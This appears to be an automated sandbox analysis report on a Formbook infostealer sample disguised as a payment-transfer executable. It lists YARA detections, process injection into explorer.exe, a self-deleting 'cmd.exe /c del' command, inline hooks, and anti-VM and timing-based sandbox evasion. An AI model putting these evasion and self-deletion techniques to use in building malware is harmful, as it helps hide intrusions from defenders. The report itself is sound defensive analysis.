          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, LogIn.cs Base64 encoded string
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.610000.0.unpack, LogIn.cs Base64 encoded string
          Source: 0.0.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.610000.0.unpack, LogIn.cs Base64 encoded string
          Source: 4.0.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.0.unpack, LogIn.cs Base64 encoded string
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.1.unpack, LogIn.cs Base64 encoded string
          Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@9/9
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.log
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1636:120:WilError_01
          Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exeVirustotal: Detection: 25%
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exeReversingLabs: Detection: 27%
          Source: unknown Process created: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
          Source: unknown Process created: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
          Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Process created: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
          Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: explorer.pdbUGP source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275056959.00000000010DF000.00000040.00000001.sdmp, explorer.exe, 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, explorer.exe
          Source: Binary string: explorer.pdb source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.610000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.610000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.4d0000.1.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_004178B3 push edi; iretd 4_2_004178B4
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00419AD3 push edx; iretd 4_2_00419AD5
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00416A8A pushfd ; retf 4_2_00416A90
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00409B8D pushfd ; ret 4_2_00409B90
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00417B8E push edi; ret 4_2_00417B9B
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00404443 push 0000007Bh; iretd 4_2_0040444C
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0040E42C push ss; iretd 4_2_0040E42D
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00419DB2 push es; iretd 4_2_00419DBD
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0041667E push edx; iretd 4_2_0041668C
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0041CEB5 push eax; ret 4_2_0041CF08
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0041CF6C push eax; ret 4_2_0041CF72
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0041CF02 push eax; ret 4_2_0041CF08
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0041CF0B push eax; ret 4_2_0041CF72
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0103D0D1 push ecx; ret 4_2_0103D0E4
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C7D0D1 push ecx; ret 9_2_04C7D0E4
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03099B8D pushfd ; ret 9_2_03099B90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A7B8E push edi; ret 9_2_030A7B9B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A6A8A pushfd ; retf 9_2_030A6A90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A9AD3 push edx; iretd 9_2_030A9AD5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A78B3 push edi; iretd 9_2_030A78B4
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030ACF0B push eax; ret 9_2_030ACF72
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030ACF02 push eax; ret 9_2_030ACF08
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030ACF6C push eax; ret 9_2_030ACF72
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A667E push edx; iretd 9_2_030A668C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030ACEB5 push eax; ret 9_2_030ACF08
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A9DB2 push es; iretd 9_2_030A9DBD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0309E42C push ss; iretd 9_2_0309E42D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03094443 push 0000007Bh; iretd 9_2_0309444C
          Source: initial sampleStatic PE information: section name: .text entropy: 7.45974448722
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeFile created: \payment transfer copy of $274,876.00 for the invoice shipments.exe

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xEA
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM_3
          Source: Yara matchFile source: 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe PID: 6512, type: MEMORY
          Source: Yara matchFile source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.2a94cf8.1.raw.unpack, type: UNPACKEDPE
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 00000000030998E4 second address: 00000000030998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 0000000003099B5E second address: 0000000003099B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00409A90 rdtsc 4_2_00409A90
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe TID: 6516Thread sleep time: -99992s >= -30000s
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe TID: 6532Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5480Thread sleep count: 84 > 30
          Source: C:\Windows\explorer.exe TID: 5480Thread sleep time: -168000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 3868Thread sleep count: 36 > 30
          Source: C:\Windows\SysWOW64\explorer.exe TID: 3868Thread sleep time: -180000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: explorer.exe, 00000005.00000000.259445531.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.259445531.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.259257447.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.258945379.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000005.00000000.251785996.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000005.00000000.259445531.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000005.00000000.259445531.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.259520617.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000005.00000002.755874779.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000005.00000000.258945379.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.258945379.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000005.00000000.258945379.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00409A90 rdtsc 4_2_00409A90
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0040ACD0 LdrLoadDll,4_2_0040ACD0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE58EC mov eax, dword ptr fs:[00000030h]4_2_00FE58EC
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01024A2C mov eax, dword ptr fs:[00000030h]4_2_01024A2C
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01074257 mov eax, dword ptr fs:[00000030h]4_2_01074257
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0109B260 mov eax, dword ptr fs:[00000030h]4_2_0109B260
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0109B260 mov eax, dword ptr fs:[00000030h]4_2_0109B260
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B8A62 mov eax, dword ptr fs:[00000030h]4_2_010B8A62
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF1B8F mov eax, dword ptr fs:[00000030h]4_2_00FF1B8F
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF1B8F mov eax, dword ptr fs:[00000030h]4_2_00FF1B8F
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0102927A mov eax, dword ptr fs:[00000030h]4_2_0102927A
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101D294 mov eax, dword ptr fs:[00000030h]4_2_0101D294
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101D294 mov eax, dword ptr fs:[00000030h]4_2_0101D294
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEDB60 mov ecx, dword ptr fs:[00000030h]4_2_00FEDB60
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEF358 mov eax, dword ptr fs:[00000030h]4_2_00FEF358
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101FAB0 mov eax, dword ptr fs:[00000030h]4_2_0101FAB0
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEDB40 mov eax, dword ptr fs:[00000030h]4_2_00FEDB40
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01012ACB mov eax, dword ptr fs:[00000030h]4_2_01012ACB
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01012AE4 mov eax, dword ptr fs:[00000030h]4_2_01012AE4
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0106A537 mov eax, dword ptr fs:[00000030h]4_2_0106A537
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01014D3B mov eax, dword ptr fs:[00000030h]4_2_01014D3B
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01014D3B mov eax, dword ptr fs:[00000030h]4_2_01014D3B
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01014D3B mov eax, dword ptr fs:[00000030h]4_2_01014D3B
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B8D34 mov eax, dword ptr fs:[00000030h]4_2_010B8D34
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01023D43 mov eax, dword ptr fs:[00000030h]4_2_01023D43
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01063540 mov eax, dword ptr fs:[00000030h]4_2_01063540
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01007D50 mov eax, dword ptr fs:[00000030h]4_2_01007D50
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF849B mov eax, dword ptr fs:[00000030h]4_2_00FF849B
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100C577 mov eax, dword ptr fs:[00000030h]4_2_0100C577
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100C577 mov eax, dword ptr fs:[00000030h]4_2_0100C577
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01012581 mov eax, dword ptr fs:[00000030h]4_2_01012581
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01012581 mov eax, dword ptr fs:[00000030h]4_2_01012581
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01012581 mov eax, dword ptr fs:[00000030h]4_2_01012581
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01012581 mov eax, dword ptr fs:[00000030h]4_2_01012581
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101FD9B mov eax, dword ptr fs:[00000030h]4_2_0101FD9B
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101FD9B mov eax, dword ptr fs:[00000030h]4_2_0101FD9B
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010135A1 mov eax, dword ptr fs:[00000030h]4_2_010135A1
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B05AC mov eax, dword ptr fs:[00000030h]4_2_010B05AC
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B05AC mov eax, dword ptr fs:[00000030h]4_2_010B05AC
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01011DB5 mov eax, dword ptr fs:[00000030h]4_2_01011DB5
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01011DB5 mov eax, dword ptr fs:[00000030h]4_2_01011DB5
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01011DB5 mov eax, dword ptr fs:[00000030h]4_2_01011DB5
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066DC9 mov eax, dword ptr fs:[00000030h]4_2_01066DC9
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066DC9 mov eax, dword ptr fs:[00000030h]4_2_01066DC9
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066DC9 mov eax, dword ptr fs:[00000030h]4_2_01066DC9
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066DC9 mov ecx, dword ptr fs:[00000030h]4_2_01066DC9
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066DC9 mov eax, dword ptr fs:[00000030h]4_2_01066DC9
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01066DC9 mov eax, dword ptr fs:[00000030h]4_2_01066DC9
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01098DF1 mov eax, dword ptr fs:[00000030h]4_2_01098DF1
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B740D mov eax, dword ptr fs:[00000030h]4_2_010B740D
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B740D mov eax, dword ptr fs:[00000030h]4_2_010B740D
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B740D mov eax, dword ptr fs:[00000030h]4_2_010B740D
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]4_2_010A1C06
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]4_2_010A1C06
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]4_2_010A1C06
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]4_2_010A1C06
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]4_2_010A1C06
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]4_2_010A1C06
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]4_2_010A1C06
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]4_2_010A1C06
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]4_2_010A1C06
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]4_2_010A1C06
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1C06 mov eax, dword ptr fs:[00000030h]4_2_010A1C06
